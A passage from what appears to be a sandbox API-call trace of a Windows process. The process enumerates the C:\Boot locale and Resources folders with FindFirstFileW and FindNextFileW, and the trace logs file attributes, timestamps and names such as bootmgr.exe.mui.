lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947fe8 [0286.370] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.370] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.370] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef62cf52, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.370] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef62cf52, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.370] FindClose (in: hFindFile=0x3947fe8 | out: hFindFile=0x3947fe8) returned 1 [0286.371] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.371] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0286.371] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.371] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39481a8 [0286.371] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.371] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.371] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6407cf, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.371] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6407cf, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.372] FindClose (in: hFindFile=0x39481a8 | out: hFindFile=0x39481a8) returned 1 [0286.372] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.372] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0286.372] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.372] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39481a8 [0286.372] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.372] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.372] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.373] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.373] FindClose (in: hFindFile=0x39481a8 | out: hFindFile=0x39481a8) returned 1 [0286.373] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.373] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0286.373] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.373] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0286.373] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.373] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.374] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65dc94, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.374] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65dc94, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.374] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0286.374] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.374] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0286.374] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.374] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947fe8 [0286.375] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.375] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.375] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6714dc, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.375] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6714dc, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.375] FindClose (in: hFindFile=0x3947fe8 | out: hFindFile=0x3947fe8) returned 1 [0286.375] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.375] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0286.376] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.376] FindFirstFileW (in: lpFileName="C:\\Boot\\qps-ploc\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39483a8 [0286.376] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.376] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.376] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef684d85, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbd1a998, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xd398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.376] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef684d85, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbd1a998, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xd398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.376] FindClose (in: hFindFile=0x39483a8 | out: hFindFile=0x39483a8) returned 1 [0286.376] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.377] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0286.377] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.377] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39481a8 [0286.377] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.377] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9abff9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef597530, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x169a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootres.dll", cAlternateFileName="")) returned 1 [0286.377] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0286.377] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4057ed0 [0286.378] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\en-US\\*", lpFindFileData=0x385f584 | out: lpFindFileData=0x385f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3947ca8 [0286.379] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f584 | out: lpFindFileData=0x385f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0286.379] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f584 | out: lpFindFileData=0x385f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9baa67, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x31acad58, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 1 [0286.379] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f584 | out: lpFindFileData=0x385f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9baa67, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x31acad58, 